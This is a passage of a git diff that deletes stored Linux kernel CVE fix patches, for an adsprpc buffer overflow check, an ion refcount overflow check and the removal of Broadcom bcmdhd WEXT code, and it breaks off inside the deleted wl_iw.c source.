- 	CASE_RETURN_STRING(WDA_EXTSCAN_GET_CACHED_RESULTS_REQ);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch
deleted file mode 100644
index cd94e134..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch
+++ /dev/null
@@ -1,68 +0,0 @@
-From 3823f0f8d0bbbbd675a42a54691f4051b3c7e544 Mon Sep 17 00:00:00 2001
-From: Sathish Ambley <sathishambley@codeaurora.org>
-Date: Wed, 25 Jan 2017 10:51:55 -0800
-Subject: msm: ADSPRPC: Check for buffer overflow condition
-
-The buffer length that is being passed could result in overflow
-condition causing invalid memory to be accessed.
-
-Change-Id: I3e23f31b8cb61f8e77d09a39fab4a2d4c222cf25
-Signed-off-by: Sathish Ambley <sathishambley@codeaurora.org>
----
- drivers/char/adsprpc.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index 95dca75..b8be20c 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -805,9 +805,9 @@ static int overlap_ptr_cmp(const void *a, const void *b)
- 	return st == 0 ? ed : st;
- }
- 
--static void context_build_overlap(struct smq_invoke_ctx *ctx)
-+static int context_build_overlap(struct smq_invoke_ctx *ctx)
- {
--	int i;
-+	int i, err = 0;
- 	remote_arg_t *lpra = ctx->lpra;
- 	int inbufs = REMOTE_SCALARS_INBUFS(ctx->sc);
- 	int outbufs = REMOTE_SCALARS_OUTBUFS(ctx->sc);
-@@ -816,6 +816,11 @@ static void context_build_overlap(struct smq_invoke_ctx *ctx)
- 	for (i = 0; i < nbufs; ++i) {
- 		ctx->overs[i].start = (uintptr_t)lpra[i].buf.pv;
- 		ctx->overs[i].end = ctx->overs[i].start + lpra[i].buf.len;
-+		if (lpra[i].buf.len) {
-+			VERIFY(err, ctx->overs[i].end > ctx->overs[i].start);
-+			if (err)
-+				goto bail;
-+		}
- 		ctx->overs[i].raix = i;
- 		ctx->overps[i] = &ctx->overs[i];
- 	}
-@@ -841,6 +846,8 @@ static void context_build_overlap(struct smq_invoke_ctx *ctx)
- 			max = *ctx->overps[i];
- 		}
- 	}
-+bail:
-+	return err;
- }
- 
- #define K_COPY_FROM_USER(err, kernel, dst, src, size) \
-@@ -913,8 +920,11 @@ static int context_alloc(struct fastrpc_file *fl, uint32_t kernel,
- 	}
- 
- 	ctx->sc = invoke->sc;
--	if (bufs)
--		context_build_overlap(ctx);
-+	if (bufs) {
-+		VERIFY(err, 0 == context_build_overlap(ctx));
-+		if (err)
-+			goto bail;
-+	}
- 	ctx->retval = -1;
- 	ctx->pid = current->pid;
- 	ctx->tgid = current->tgid;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch
deleted file mode 100644
index 3c43eb3c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 03c26a1d8c8687131da151c2e4bd5a04d08e0dec Mon Sep 17 00:00:00 2001
-From: Ariel Yin <ayin@google.com>
-Date: Fri, 13 Jan 2017 15:05:54 -0800
-Subject: [PATCH] ANDROID: ion: check for kref overflow
-
-Userspace can cause the kref to handles to increment
-arbitrarily high. Ensure it does not overflow.
-
-Signed-off-by: Daniel Rosenberg <drosen@google.com>
-
-Bug: 31992382
-Test: See bug for poc
-Change-Id: I6bff1df385742b1d836d43180dc87fadcea80782
----
- drivers/staging/android/ion/ion.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index cc1b3bff392ac..48b6b86a61945 100644
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -16,6 +16,8 @@
-  *
-  */
- 
-+#include <linux/atomic.h>
-+#include <linux/err.h>
- #include <linux/file.h>
- #include <linux/freezer.h>
- #include <linux/fs.h>
-@@ -400,6 +402,15 @@ static void ion_handle_get(struct ion_handle *handle)
- 	kref_get(&handle->ref);
- }
- 
-+/* Must hold the client lock */
-+static struct ion_handle* ion_handle_get_check_overflow(struct ion_handle *handle)
-+{
-+	if (atomic_read(&handle->ref.refcount) + 1 == 0)
-+		return ERR_PTR(-EOVERFLOW);
-+	ion_handle_get(handle);
-+	return handle;
-+}
-+
- int ion_handle_put_nolock(struct ion_handle *handle)
- {
- 	int ret;
-@@ -445,9 +456,9 @@ struct ion_handle *ion_handle_get_by_id_nolock(struct ion_client *client,
- 
- 	handle = idr_find(&client->idr, id);
- 	if (handle)
--		ion_handle_get(handle);
-+		return ion_handle_get_check_overflow(handle);
- 
--	return handle ? handle : ERR_PTR(-EINVAL);
-+	return ERR_PTR(-EINVAL);
- }
- 
- struct ion_handle *ion_handle_get_by_id(struct ion_client *client,
-@@ -1339,7 +1350,7 @@ struct ion_handle *ion_import_dma_buf(struct ion_client *client, int fd)
- 	/* if a handle exists for this buffer just take a reference to it */
- 	handle = ion_handle_lookup(client, buffer);
- 	if (!IS_ERR(handle)) {
--		ion_handle_get(handle);
-+		handle = ion_handle_get_check_overflow(handle);
- 		mutex_unlock(&client->lock);
- 		goto end;
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch
deleted file mode 100644
index a14fce76..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch
+++ /dev/null
@@ -1,4341 +0,0 @@
-From 9c5e11d70f209553d023ea2b79efe7b2bf85fd5e Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Tue, 3 Jan 2017 16:21:01 -0800
-Subject: [PATCH] net: wireless: bcmdhd: remove unsed WEXT file.
-
-WEXT API was already obsoleted and should be removed.
-
-Bug: 34199963
-Change-Id: Iffb1c81afb9874120c64008c1072eebb8695c65f
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 32124445
----
- drivers/net/wireless/bcmdhd/Kconfig           |    8 -
- drivers/net/wireless/bcmdhd/dhd_common.c      |  203 --
- drivers/net/wireless/bcmdhd/dhd_custom_gpio.c |    7 +-
- drivers/net/wireless/bcmdhd/dhd_linux.c       |   90 -
- drivers/net/wireless/bcmdhd/dhd_linux.h       |    5 +-
- drivers/net/wireless/bcmdhd/wl_iw.c           | 3696 -------------------------
- drivers/net/wireless/bcmdhd/wl_iw.h           |  161 --
- 7 files changed, 7 insertions(+), 4163 deletions(-)
- delete mode 100644 drivers/net/wireless/bcmdhd/wl_iw.c
- delete mode 100644 drivers/net/wireless/bcmdhd/wl_iw.h
-
-diff --git a/drivers/net/wireless/bcmdhd/Kconfig b/drivers/net/wireless/bcmdhd/Kconfig
-index b19c557c8e61b..1ec72f8af16a3 100644
---- a/drivers/net/wireless/bcmdhd/Kconfig
-+++ b/drivers/net/wireless/bcmdhd/Kconfig
-@@ -43,14 +43,6 @@ config BCMDHD_NVRAM_PATH
- 	---help---
- 	  Path to the calibration file.
- 
--config BCMDHD_WEXT
--	bool "Enable WEXT support"
--	depends on BCMDHD && CFG80211 = n
--	select WIRELESS_EXT
--	select WEXT_PRIV
--	help
--	  Enables WEXT support
--
- config DHD_USE_STATIC_BUF
- 	bool "Enable memory preallocation"
- 	depends on BCMDHD
-diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c
-index 0b2ab8e8ac78f..1f457fae6b178 100644
---- a/drivers/net/wireless/bcmdhd/dhd_common.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_common.c
-@@ -84,9 +84,6 @@ extern void htsf_update(struct dhd_info *dhd, void *data);
- #endif
- int dhd_msg_level = DHD_ERROR_VAL;
- 
--
--#include <wl_iw.h>
--
- #ifdef SOFTAP
- char fw_path2[MOD_PARAM_PATHLEN];
- extern bool softap_enabled;
-@@ -2732,203 +2729,3 @@ wl_iw_parse_data_tlv(char** list_str, void *dst, int dst_size, const char token,
- 	return 1;
- }
- 
--/*
-- *  channel list parsing from cscan tlv list
--*/
--int
--wl_iw_parse_channel_list_tlv(char** list_str, uint16* channel_list,
--                             int channel_num, int *bytes_left)
--{
--	char* str;
--	int idx = 0;
--
--	if ((list_str == NULL) || (*list_str == NULL) ||(bytes_left == NULL) || (*bytes_left < 0)) {
--		DHD_ERROR(("%s error paramters\n", __FUNCTION__));
--		return -1;
--	}
--	str = *list_str;
--
--	while (*bytes_left > 0) {
--
--		if (str[0] != CSCAN_TLV_TYPE_CHANNEL_IE) {
--			*list_str = str;
--			DHD_TRACE(("End channel=%d left_parse=%d %d\n", idx, *bytes_left, str[0]));
--			return idx;
--		}
--		/* Get proper CSCAN_TLV_TYPE_CHANNEL_IE */
--		*bytes_left -= 1;
--		str += 1;
--
--		if (str[0] == 0) {
--			/* All channels */
--			channel_list[idx] = 0x0;
--		}
--		else {
--			channel_list[idx] = (uint16)str[0];
--			DHD_TRACE(("%s channel=%d \n", __FUNCTION__,  channel_list[idx]));
--		}
--		*bytes_left -= 1;
--		str += 1;
--
--		if (idx++ > 255) {
--			DHD_ERROR(("%s Too many channels \n", __FUNCTION__));
--			return -1;
--		}
--	}
--
--	*list_str = str;
--	return idx;
--}
--
--/*
-- *  SSIDs list parsing from cscan tlv list
-- */
--int
--wl_iw_parse_ssid_list_tlv(char** list_str, wlc_ssid_ext_t* ssid, int max, int *bytes_left)
--{
--	char* str;
--	int idx = 0;
--
--	if ((list_str == NULL) || (*list_str == NULL) || (*bytes_left < 0)) {
--		DHD_ERROR(("%s error paramters\n", __FUNCTION__));
--		return -1;
--	}
--	str = *list_str;
--	while (*bytes_left > 0) {
--
--		if (str[0] != CSCAN_TLV_TYPE_SSID_IE) {
--			*list_str = str;
--			DHD_TRACE(("nssid=%d left_parse=%d %d\n", idx, *bytes_left, str[0]));
--			return idx;
--		}
--
--		/* Get proper CSCAN_TLV_TYPE_SSID_IE */
--		*bytes_left -= 1;
--		str += 1;
--		ssid[idx].rssi_thresh = 0;
--		if (str[0] == 0) {
--			/* Broadcast SSID */
--			ssid[idx].SSID_len = 0;
--			memset((char*)ssid[idx].SSID, 0x0, DOT11_MAX_SSID_LEN);
--			*bytes_left -= 1;
--			str += 1;
--
--			DHD_TRACE(("BROADCAST SCAN  left=%d\n", *bytes_left));
--		}
--		else if (str[0] <= DOT11_MAX_SSID_LEN) {
--			/* Get proper SSID size */
--			ssid[idx].SSID_len = str[0];
--			*bytes_left -= 1;
--			str += 1;
--
--			/* Get SSID */
--			if (ssid[idx].SSID_len > *bytes_left) {
--				DHD_ERROR(("%s out of memory range len=%d but left=%d\n",
--				__FUNCTION__, ssid[idx].SSID_len, *bytes_left));
--				return -1;
--			}
--
--			memcpy((char*)ssid[idx].SSID, str, ssid[idx].SSID_len);
--
--			*bytes_left -= ssid[idx].SSID_len;
--			str += ssid[idx].SSID_len;
--			ssid[idx].hidden = TRUE;
--
--			DHD_TRACE(("%s :size=%d left=%d\n",
--				(char*)ssid[idx].SSID, ssid[idx].SSID_len, *bytes_left));
--		}
--		else {
--			DHD_ERROR(("### SSID size more that %d\n", str[0]));
--			return -1;
--		}
--
--		if (idx++ >  max) {
--			DHD_ERROR(("%s number of SSIDs more that %d\n", __FUNCTION__, idx));
--			return -1;
--		}
--	}
--
--	*list_str = str;
--	return idx;
--}
--
--/* Parse a comma-separated list from list_str into ssid array, starting
-- * at index idx.  Max specifies size of the ssid array.  Parses ssids
-- * and returns updated idx; if idx >= max not all fit, the excess have
-- * not been copied.  Returns -1 on empty string, or on ssid too long.
-- */
--int
--wl_iw_parse_ssid_list(char** list_str, wlc_ssid_t* ssid, int idx, int max)
--{
--	char* str, *ptr;
--
--	if ((list_str == NULL) || (*list_str == NULL))
--		return -1;
--
--	for (str = *list_str; str != NULL; str = ptr) {
--
--		/* check for next TAG */
--		if (!strncmp(str, GET_CHANNEL, strlen(GET_CHANNEL))) {
--			*list_str	 = str + strlen(GET_CHANNEL);
--			return idx;
--		}
--
--		if ((ptr = strchr(str, ',')) != NULL) {
--			*ptr++ = '\0';
--		}
--
--		if (strlen(str) > DOT11_MAX_SSID_LEN) {
--			DHD_ERROR(("ssid <%s> exceeds %d\n", str, DOT11_MAX_SSID_LEN));
--			return -1;
--		}
--
--		if (strlen(str) == 0)
--			ssid[idx].SSID_len = 0;
--
--		if (idx < max) {
--			bzero(ssid[idx].SSID, sizeof(ssid[idx].SSID));
--			strncpy((char*)ssid[idx].SSID, str, sizeof(ssid[idx].SSID) - 1);
--			ssid[idx].SSID_len = strlen(str);
--		}
--		idx++;
--	}
--	return idx;
--}
--
--/*
-- * Parse channel list from iwpriv CSCAN
-- */
--int
--wl_iw_parse_channel_list(char** list_str, uint16* channel_list, int channel_num)
--{
--	int num;
--	int val;
--	char* str;
--	char* endptr = NULL;
--
--	if ((list_str == NULL)||(*list_str == NULL))
--		return -1;
--
--	str = *list_str;
--	num = 0;
--	while (strncmp(str, GET_NPROBE, strlen(GET_NPROBE))) {
--		val = (int)strtoul(str, &endptr, 0);
--		if (endptr == str) {
--			printf("could not parse channel number starting at"
--				" substring \"%s\" in list:\n%s\n",
--				str, *list_str);
--			return -1;
--		}
--		str = endptr + strspn(endptr, " ,");
--
--		if (num == channel_num) {
--			DHD_ERROR(("too many channels (more than %d) in channel list:\n%s\n",
--				channel_num, *list_str));
--			return -1;
--		}
--
--		channel_list[num++] = (uint16)val;
--	}
--	*list_str = str;
--	return num;
--}
-diff --git a/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c b/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c
-index b7d162c2172e5..d366e94d80392 100644
---- a/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c
-@@ -32,7 +32,6 @@
- #include <dhd_linux.h>
- 
- #include <wlioctl.h>
--#include <wl_iw.h>
- 
- #define WL_ERROR(x) printf x
- #define WL_TRACE(x)
-@@ -140,6 +139,12 @@ dhd_custom_get_mac_address(void *adapter, unsigned char *buf)
- }
- #endif /* GET_CUSTOM_MAC_ENABLE */
- 
-+struct cntry_locales_custom {
-+	char iso_abbrev[WLC_CNTRY_BUF_SZ];
-+	char custom_locale[WLC_CNTRY_BUF_SZ];
-+	int32 custom_locale_rev;
-+};
-+
- /* Customized Locale table : OPTIONAL feature */
- const struct cntry_locales_custom translate_custom_table[] = {
- /* Table should be filled out based on custom platform regulatory requirement */
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 6fa42b097e058..e99abe6c64d27 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -246,12 +246,6 @@ print_tainted()
- }
- #endif	/* LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 15) */
- 
--/* Linux wireless extension support */
--#if defined(WL_WIRELESS_EXT)
--#include <wl_iw.h>
--extern wl_iw_extra_params_t  g_wl_iw_params;
--#endif /* defined(WL_WIRELESS_EXT) */
--
- #if defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND)
- #include <linux/earlysuspend.h>
- #endif /* defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) */
-@@ -369,9 +363,6 @@ struct ipv6_work_info_t {
- 
- /* Local private structure (extension of pub) */
- typedef struct dhd_info {
--#if defined(WL_WIRELESS_EXT)
--	wl_iw_t		iw;		/* wireless extensions state (must be first) */
--#endif /* defined(WL_WIRELESS_EXT) */
- 	dhd_pub_t pub;
- 	dhd_if_t *iflist[DHD_MAX_IFS]; /* for supporting multiple interfaces */
- 
-@@ -692,10 +683,6 @@ int dhd_monitor_init(void *dhd_pub);
- int dhd_monitor_uninit(void);
- 
- 
--#if defined(WL_WIRELESS_EXT)
--struct iw_statistics *dhd_get_wireless_stats(struct net_device *dev);
--#endif /* defined(WL_WIRELESS_EXT) */
--
- static void dhd_dpc(ulong data);
- /* forward decl */
- extern int dhd_wait_pend8021x(struct net_device *dev);
-@@ -4040,17 +4027,6 @@ dhd_ioctl_entry(struct net_device *net, struct ifreq *ifr, int cmd)
- 		return -1;
- 	}
- 
--#if defined(WL_WIRELESS_EXT)
--	/* linux wireless extensions */
--	if ((cmd >= SIOCIWFIRST) && (cmd <= SIOCIWLAST)) {
--		/* may recurse, do NOT lock */
--		ret = wl_iw_ioctl(net, ifr, cmd);
--		DHD_PERIM_UNLOCK(&dhd->pub);
--		DHD_OS_WAKE_UNLOCK(&dhd->pub);
--		return ret;
--	}
--#endif /* defined(WL_WIRELESS_EXT) */
--
- #if LINUX_VERSION_CODE > KERNEL_VERSION(2, 4, 2)
- 	if (cmd == SIOCETHTOOL) {
- 		ret = dhd_ethtool(dhd, (void*)ifr->ifr_data);
-@@ -5017,17 +4993,6 @@ dhd_attach(osl_t *osh, struct dhd_bus *bus, uint bus_hdrlen)
- 	dhd_monitor_init(&dhd->pub);
- 	dhd_state |= DHD_ATTACH_STATE_CFG80211;
- #endif
--#if defined(WL_WIRELESS_EXT)
--	/* Attach and link in the iw */
--	if (!(dhd_state &  DHD_ATTACH_STATE_CFG80211)) {
--		if (wl_iw_attach(net, (void *)&dhd->pub) != 0) {
--		DHD_ERROR(("wl_iw_attach failed\n"));
--		goto fail;
--	}
--	dhd_state |= DHD_ATTACH_STATE_WL_ATTACH;
--	}
--#endif /* defined(WL_WIRELESS_EXT) */
--
- 	/* attach debug support */
- 	if (dhd_os_dbg_attach(&dhd->pub)) {
- 		DHD_ERROR(("%s debug module attach failed\n", __FUNCTION__));
-@@ -6831,15 +6796,6 @@ dhd_register_if(dhd_pub_t *dhdp, int ifidx, bool need_rtnl_lock)
- 	net->ethtool_ops = &dhd_ethtool_ops;
- #endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 24) */
- 
--#if defined(WL_WIRELESS_EXT)
--#if WIRELESS_EXT < 19
--	net->get_wireless_stats = dhd_get_wireless_stats;
--#endif /* WIRELESS_EXT < 19 */
--#if WIRELESS_EXT > 12
--	net->wireless_handlers = (struct iw_handler_def *)&wl_iw_handler_def;
--#endif /* WIRELESS_EXT > 12 */
--#endif /* defined(WL_WIRELESS_EXT) */
--
- 	dhd->pub.rxsz = DBUS_RX_BUFFER_SIZE_DHD(net);
- 
- 	memcpy(net->dev_addr, temp_addr, ETHER_ADDR_LEN);
-@@ -6862,10 +6818,6 @@ dhd_register_if(dhd_pub_t *dhdp, int ifidx, bool need_rtnl_lock)
- 	printf("Register interface [%s]  MAC: "MACDBG"\n\n", net->name,
- 		MAC2STRDBG(net->dev_addr));
- 
--#if defined(SOFTAP) && defined(WL_WIRELESS_EXT) && !defined(WL_CFG80211)
--		wl_iw_iscan_set_scan_broadcast_prep(net, 1);
--#endif
--
- #if defined(BCMLXSDMMC) && (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
- 	if (ifidx == 0) {
- #ifdef BCMLXSDMMC
-@@ -6993,13 +6945,6 @@ void dhd_detach(dhd_pub_t *dhdp)
- 	}
- #endif /* CONFIG_HAS_EARLYSUSPEND && DHD_USE_EARLYSUSPEND */
- 
--#if defined(WL_WIRELESS_EXT)
--	if (dhd->dhd_state & DHD_ATTACH_STATE_WL_ATTACH) {
--		/* Detatch and unlink in the iw */
--		wl_iw_detach();
--	}
--#endif /* defined(WL_WIRELESS_EXT) */
--
- 	/* delete all interfaces, start with virtual  */
- 	if (dhd->dhd_state & DHD_ATTACH_STATE_ADD_IF) {
- 		int i = 1;
-@@ -7614,26 +7559,6 @@ void dhd_os_prefree(dhd_pub_t *dhdpub, void *addr, uint size)
- {
- }
- 
--#if defined(WL_WIRELESS_EXT)
--struct iw_statistics *
--dhd_get_wireless_stats(struct net_device *dev)
--{
--	int res = 0;
--	dhd_info_t *dhd = DHD_DEV_INFO(dev);
--
--	if (!dhd->pub.up) {
--		return NULL;
--	}
--
--	res = wl_iw_get_wireless_stats(dev, &dhd->iw.wstats);
--
--	if (res == 0)
--		return &dhd->iw.wstats;
--	else
--		return NULL;
--}
--#endif /* defined(WL_WIRELESS_EXT) */
--
- static int
- dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
- 	wl_event_msg_t *event, void **data)
-@@ -7656,18 +7581,6 @@ dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
- 	if ((dhd->iflist[*ifidx] == NULL) || (dhd->iflist[*ifidx]->net == NULL))
- 		return BCME_ERROR;
- 
--#if defined(WL_WIRELESS_EXT)
--	if (event->bsscfgidx == 0) {
--		/*
--		 * Wireless ext is on primary interface only
--		 */
--
--		if (dhd->iflist[*ifidx]->net) {
--			wl_iw_event(dhd->iflist[*ifidx]->net, event, *data);
--		}
--	}
--#endif /* defined(WL_WIRELESS_EXT)  */
--
- #ifdef WL_CFG80211
- 
- 	if (dhd->iflist[*ifidx]->net)
-@@ -9370,9 +9283,6 @@ static void dhd_hang_process(void *dhd_info, void *event_info, u8 event)
- 		dev_close(dev);
- 		rtnl_unlock();
- #endif
--#if defined(WL_WIRELESS_EXT)
--		wl_iw_send_priv_event(dev, "HANG");
--#endif
- #if defined(WL_CFG80211)
- 		wl_cfg80211_hang(dev, WLAN_REASON_UNSPECIFIED);
- #endif
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.h b/drivers/net/wireless/bcmdhd/dhd_linux.h
-index e3cf3af82e547..b3d836c6b13c0 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.h
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.h
-@@ -40,10 +40,7 @@
- #ifdef DHD_WMF
- #include <dhd_wmf_linux.h>
- #endif
--/* Linux wireless extension support */
--#if defined(WL_WIRELESS_EXT)
--#include <wl_iw.h>
--#endif /* defined(WL_WIRELESS_EXT) */
-+
- #if defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND)
- #include <linux/earlysuspend.h>
- #endif /* defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) */
-diff --git a/drivers/net/wireless/bcmdhd/wl_iw.c b/drivers/net/wireless/bcmdhd/wl_iw.c
-deleted file mode 100644
-index fc037be8c29c9..0000000000000
---- a/drivers/net/wireless/bcmdhd/wl_iw.c
-+++ /dev/null
-@@ -1,3696 +0,0 @@
--/*
-- * Linux Wireless Extensions support
-- *
-- * Copyright (C) 1999-2014, Broadcom Corporation
-- * 
-- *      Unless you and Broadcom execute a separate written software license
-- * agreement governing use of this software, this software is licensed to you
-- * under the terms of the GNU General Public License version 2 (the "GPL"),
-- * available at http://www.broadcom.com/licenses/GPLv2.php, with the
-- * following added to such license:
-- * 
-- *      As a special exception, the copyright holders of this software give you
-- * permission to link this software with independent modules, and to copy and
-- * distribute the resulting executable under terms of your choice, provided that
-- * you also meet, for each linked independent module, the terms and conditions of
-- * the license of that module.  An independent module is a module which is not
-- * derived from this software.  The special exception does not apply to any
-- * modifications of the software.
-- * 
-- *      Notwithstanding the above, under no circumstances may you combine this
-- * software in any way with any other Broadcom software provided under a license
-- * other than the GPL, without Broadcom's express prior written consent.
-- *
-- * $Id: wl_iw.c 467328 2014-04-03 01:23:40Z $
-- */
--
--#if defined(USE_IW)
--#define LINUX_PORT
--
--#include <typedefs.h>
--#include <linuxver.h>
--#include <osl.h>
--
--#include <bcmutils.h>
--#include <bcmendian.h>
--#include <proto/ethernet.h>
--
--#include <linux/if_arp.h>
--#include <asm/uaccess.h>
--
--typedef const struct si_pub	si_t;
--#include <wlioctl.h>
--
--
--#include <wl_dbg.h>
--#include <wl_iw.h>
--
--
--/* Broadcom extensions to WEXT, linux upstream has obsoleted WEXT */
--#ifndef IW_AUTH_KEY_MGMT_FT_802_1X
--#define IW_AUTH_KEY_MGMT_FT_802_1X 0x04
--#endif
--
--#ifndef IW_AUTH_KEY_MGMT_FT_PSK
--#define IW_AUTH_KEY_MGMT_FT_PSK 0x08
--#endif
--
--#ifndef IW_ENC_CAPA_FW_ROAM_ENABLE
--#define IW_ENC_CAPA_FW_ROAM_ENABLE	0x00000020
--#endif
--
--
--/* FC9: wireless.h 2.6.25-14.fc9.i686 is missing these, even though WIRELESS_EXT is set to latest
-- * version 22.
-- */
--#ifndef IW_ENCODE_ALG_PMK
--#define IW_ENCODE_ALG_PMK 4
--#endif
--#ifndef IW_ENC_CAPA_4WAY_HANDSHAKE
--#define IW_ENC_CAPA_4WAY_HANDSHAKE 0x00000010
--#endif
--/* End FC9. */
--
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
--#include <linux/rtnetlink.h>
--#endif
--#if defined(SOFTAP)
--struct net_device *ap_net_dev = NULL;
--tsk_ctl_t ap_eth_ctl;  /* apsta AP netdev waiter thread */
--#endif /* SOFTAP */
--
--extern bool wl_iw_conn_status_str(uint32 event_type, uint32 status,
--	uint32 reason, char* stringBuf, uint buflen);
--
--uint wl_msg_level = WL_ERROR_VAL;
--
--#define MAX_WLIW_IOCTL_LEN 1024
--
--/* IOCTL swapping mode for Big Endian host with Little Endian dongle.  Default to off */
--#define htod32(i) (i)
--#define htod16(i) (i)
--#define dtoh32(i) (i)
--#define dtoh16(i) (i)
--#define htodchanspec(i) (i)
--#define dtohchanspec(i) (i)
--
--extern struct iw_statistics *dhd_get_wireless_stats(struct net_device *dev);
--extern int dhd_wait_pend8021x(struct net_device *dev);
--
--#if WIRELESS_EXT < 19
--#define IW_IOCTL_IDX(cmd)	((cmd) - SIOCIWFIRST)
--#define IW_EVENT_IDX(cmd)	((cmd) - IWEVFIRST)
--#endif /* WIRELESS_EXT < 19 */
--
--
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 8, 0))
--#define DAEMONIZE(a)	do { \
--		allow_signal(SIGKILL);	\
--		allow_signal(SIGTERM);	\
--	} while (0)
--#elif ((LINUX_VERSION_CODE < KERNEL_VERSION(3, 8, 0)) && \
--	(LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 0)))
--#define DAEMONIZE(a) daemonize(a); \
--	allow_signal(SIGKILL); \
--	allow_signal(SIGTERM);
--#else /* Linux 2.4 (w/o preemption patch) */
--#define RAISE_RX_SOFTIRQ() \
--	cpu_raise_softirq(smp_processor_id(), NET_RX_SOFTIRQ)
--#define DAEMONIZE(a) daemonize(); \
--	do { if (a) \
--		strncpy(current->comm, a, MIN(sizeof(current->comm), (strlen(a) + 1))); \
--	} while (0);
--#endif /* LINUX_VERSION_CODE  */
--
--#define ISCAN_STATE_IDLE   0
--#define ISCAN_STATE_SCANING 1
--
--/* the buf lengh can be WLC_IOCTL_MAXLEN (8K) to reduce iteration */
--#define WLC_IW_ISCAN_MAXLEN   2048
--typedef struct iscan_buf {
--	struct iscan_buf * next;
--	char   iscan_buf[WLC_IW_ISCAN_MAXLEN];
--} iscan_buf_t;
--
--typedef struct iscan_info {
--	struct net_device *dev;
--	struct timer_list timer;
--	uint32 timer_ms;
--	uint32 timer_on;
--	int    iscan_state;
--	iscan_buf_t * list_hdr;
--	iscan_buf_t * list_cur;
--
--	/* Thread to work on iscan */
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0))
--	struct task_struct *kthread;
--#endif
--	long sysioc_pid;
--	struct semaphore sysioc_sem;
--	struct completion sysioc_exited;
--
--
--	char ioctlbuf[WLC_IOCTL_SMLEN];
--} iscan_info_t;
--iscan_info_t *g_iscan = NULL;
--static void wl_iw_timerfunc(ulong data);
--static void wl_iw_set_event_mask(struct net_device *dev);
--static int wl_iw_iscan(iscan_info_t *iscan, wlc_ssid_t *ssid, uint16 action);
--
--/* priv_link becomes netdev->priv and is the link between netdev and wlif struct */
--typedef struct priv_link {
--	wl_iw_t *wliw;
--} priv_link_t;
--
--/* dev to priv_link */
--#if (LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 24))
--#define WL_DEV_LINK(dev)       (priv_link_t*)(dev->priv)
--#else
--#define WL_DEV_LINK(dev)       (priv_link_t*)netdev_priv(dev)
--#endif
--
--/* dev to wl_iw_t */
--#define IW_DEV_IF(dev)          ((wl_iw_t*)(WL_DEV_LINK(dev))->wliw)
--
--static void swap_key_from_BE(
--	        wl_wsec_key_t *key
--)
--{
--	key->index = htod32(key->index);
--	key->len = htod32(key->len);
--	key->algo = htod32(key->algo);
--	key->flags = htod32(key->flags);
--	key->rxiv.hi = htod32(key->rxiv.hi);
--	key->rxiv.lo = htod16(key->rxiv.lo);
--	key->iv_initialized = htod32(key->iv_initialized);
--}
--
--static void swap_key_to_BE(
--	        wl_wsec_key_t *key
--)
--{
--	key->index = dtoh32(key->index);
--	key->len = dtoh32(key->len);
--	key->algo = dtoh32(key->algo);
--	key->flags = dtoh32(key->flags);
--	key->rxiv.hi = dtoh32(key->rxiv.hi);
--	key->rxiv.lo = dtoh16(key->rxiv.lo);
--	key->iv_initialized = dtoh32(key->iv_initialized);
--}
--
--static int
--dev_wlc_ioctl(
--	struct net_device *dev,
--	int cmd,
--	void *arg,
--	int len
--)
--{
--	struct ifreq ifr;
--	wl_ioctl_t ioc;
--	mm_segment_t fs;
--	int ret;
--
--	memset(&ioc, 0, sizeof(ioc));
--	ioc.cmd = cmd;
--	ioc.buf = arg;
--	ioc.len = len;
--
--	strcpy(ifr.ifr_name, dev->name);
